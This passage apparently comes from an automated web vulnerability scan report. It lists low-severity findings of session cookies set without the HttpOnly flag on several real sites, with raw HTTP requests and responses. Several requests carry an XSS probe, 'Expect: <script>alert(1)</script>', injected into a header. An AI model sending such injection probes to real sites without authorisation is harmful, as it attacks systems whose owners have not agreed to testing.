Host: www.mylearningplan.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 492
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=%7BB37083AE%2D04D4%2D461A%2DB2D9%2D387A5E72C198%7D; domain=.mylearningplan.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT

<div id='section_D'>
           <h1><b>Error Message</b></h1>
<div class='alert'>
<p></p>
<p></p>
<p align='center'><strong>Error: An Error Has occurred on this page</strong></p>
<p></p>
<p align='cent
...[SNIP]...

17.21. http://www.mypearsonstore.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mypearsonstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mypearsonstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Sun, 01 May 2011 23:16:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: session=id=1f7711ae-12b1-466f-b34a-a48a84f6ed3d&db=0; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4252

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Error</title><meta http
...[SNIP]...

17.22. http://www.newswiretoday.com/news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.newswiretoday.com
Path:   /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /news/89806/The_Netherlands_1_Real_Estate_Company_Selects_OUTSCAN_for_Vulnerability_Assessment_and_Management/ HTTP/1.1
Host: www.newswiretoday.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:30:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=8kel0h54alrfeeq12er0b6lst4; path=/
Set-Cookie: phpjob_aff_id=0; expires=Mon, 01-Aug-2011 04:00:00 GMT
Set-Cookie: phpjob_lng=english; expires=Mon, 01-Aug-2011 04:00:00 GMT
Connection: close
Content-Type: text/html
Content-Length: 45114

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Newswire / The Netherlands #1 Real Estate Company Selects OUTSCAN for Vulnerability Assessment and Management -
...[SNIP]...

17.23. https://www.onlinemicrofiche.com/WPS/shoppingcart/checkout/Viewcart.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /WPS/shoppingcart/checkout/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WPS/shoppingcart/checkout/Viewcart.asp?expand=1019 HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:19:39 GMT
Content-Length: 543
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=PLJKBIKAHEBHCEPODDOPNNGN; path=/
Cache-control: private


<html>
<head>
<title>World of Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border=
...[SNIP]...

17.24. https://www.onlinemicrofiche.com/xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.onlinemicrofiche.com
Path:   /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /xtremepowersports/shoppingcart/CheckOut/Viewcart.asp HTTP/1.1
Host: www.onlinemicrofiche.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Mon, 02 May 2011 03:21:43 GMT
Content-Length: 541
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQCSQTSDS=MGKKBIKAJLALKLHMGNHCJDNK; path=/
Cache-control: private


<html>
<head>
<title>Xtreme Powersports' Check Out</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<frameset rows="180,*" frameborder="No" border="0
...[SNIP]...

17.25. http://www.ptcb.org/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.ptcb.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ptcb.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Sun, 01 May 2011 23:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=4880537;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
Set-Cookie: CFTOKEN=39658861;domain=.ptcb.org;expires=Tue, 23-Apr-2041 23:55:51 GMT;path=/
location: https://www.ptcb.org//AM/Template.cfm?Section=Home1&WebsiteKey=9d90bd98-be45-4b90-ae8c-25ab71fa0923
Content-Type: text/html; charset=UTF-8

<!-- Source Code Copyright .. 2005 by Advanced Solutions International, Inc. -->

17.26. http://www.securom.com/favicon.ico

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securom.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.securom.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Object moved
Cache-Control: private
Content-Length: 167
Content-Type: text/html
Location: http://www.securom.com:80/download/favicon.ico
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAABRTTS=GHLMJLDCHNEHOGHADNDFFCHL; path=/
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:22:24 GMT

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="http://www.securom.com:80/download/favicon.ico">here</a>.</body>

17.27. http://www.seoq.com/webstatshq/www.onlinemicrofiche.com

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /webstatshq/www.onlinemicrofiche.com

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webstatshq/www.onlinemicrofiche.com HTTP/1.1
Host: www.seoq.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:12:53 GMT
Server: Apache
Set-Cookie: PHPSESSID=doqq36j3lfipqlju261e9vveq7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Content-Length: 57234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>www.onlinemicrofich
...[SNIP]...

17.28. http://www.seoq.com/wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/los-angeles-accent-reduction-voice-coach.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:10 GMT
Server: Apache
Set-Cookie: PHPSESSID=dmrsl377t3kamtrburghhgs7h7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12851

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.29. http://www.seoq.com/wp-content/uploads/2008/07/plastic-business-card.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/plastic-business-card.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/plastic-business-card.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:22 GMT
Server: Apache
Set-Cookie: PHPSESSID=bsdds49l14shn4f75a79hscdv7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:22 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.30. http://www.seoq.com/wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/posting-blog-entry-with-wordpress.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=thqpn70su4cv7ht7rbrref0ja4; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:38 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12844

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.31. http://www.seoq.com/wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/washington-dc-web-page-designer.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=dler6f6f9e9el2gd44qef454c7; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:16 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12842

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.32. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-for-iphone.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-for-iphone.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/wordpress-for-iphone.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:16 GMT
Server: Apache
Set-Cookie: PHPSESSID=a90bq0ka7dbph6a2c3i6ra6757; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:17 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12831

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.33. http://www.seoq.com/wp-content/uploads/2008/07/wordpress-users-guide.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/07/wordpress-users-guide.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/07/wordpress-users-guide.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:43:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=5uvpfm92vhm8sjc050353p2280; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:43:20 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12832

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.34. http://www.seoq.com/wp-content/uploads/2008/08/before-en.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/before-en.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/before-en.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:35 GMT
Server: Apache
Set-Cookie: PHPSESSID=e3tmqsse418t5e97gc66chvei2; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:36 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.35. http://www.seoq.com/wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/circuit-city-stock-price-crash.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:58 GMT
Server: Apache
Set-Cookie: PHPSESSID=fgl2jovfcb50uf72m2fkieceq6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:59 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.36. http://www.seoq.com/wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/target-stock-on-the-rise1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:46:25 GMT
Server: Apache
Set-Cookie: PHPSESSID=7uj7e9ldpg45knc7fkags98qi0; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:46:25 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12836

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.37. http://www.seoq.com/wp-content/uploads/2008/08/target.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/08/target.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/08/target.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:44:57 GMT
Server: Apache
Set-Cookie: PHPSESSID=mpoko4q3f16vbpjlk8pjk1d350; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:44:58 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12817

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.38. http://www.seoq.com/wp-content/uploads/2008/09/biznik-professional-networking-site.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/09/biznik-professional-networking-site.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:29 GMT
Server: Apache
Set-Cookie: PHPSESSID=pbhe1jtfilvbh1gnd13tgl5r87; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12846

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.39. http://www.seoq.com/wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wp-content/uploads/2008/09/g1-google-iphone-by-t-mobile.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.seoq.com

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:45:17 GMT
Server: Apache
Set-Cookie: PHPSESSID=q3oq59gdqk5qddjugp1t6q68v6; path=/
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.seoq.com/xmlrpc.php
Last-Modified: Mon, 02 May 2011 02:45:18 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 12839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

17.40. http://www.seoq.com/wp-content/uploads/2008/09/search-statistics.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.seoq.com
Path:   /wp-content/uploads/2008/09/search-statistics.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

